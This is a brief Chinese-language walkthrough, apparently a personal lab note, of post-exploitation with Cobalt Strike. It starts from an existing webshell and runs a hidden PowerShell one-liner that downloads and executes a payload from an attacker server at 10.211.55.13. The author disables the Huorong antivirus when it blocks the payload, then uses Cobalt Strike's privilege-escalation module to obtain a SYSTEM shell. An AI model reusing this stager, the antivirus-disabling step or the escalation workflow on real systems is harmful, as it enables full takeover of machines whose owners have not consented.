前提已经拿到了一个webshell
使用CS创建一个Listener,并生成攻击payload
点击launch之后会弹出命令
1 | powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.211.55.13:8081/a'))" |
在蚁剑中执行以上命令发现CS中没有成功上线,看了一眼发现是火绒拦截了
那就把火绒退掉再试一下👻
成功上线。。。
此时使用shell查看权限为普通用户权限
尝试提权,使用CS自带的Windows提权模块进行提权,按照流程创建一个TCP的listener,点击开始之后稍等片刻即可得到一个权限为System的shell。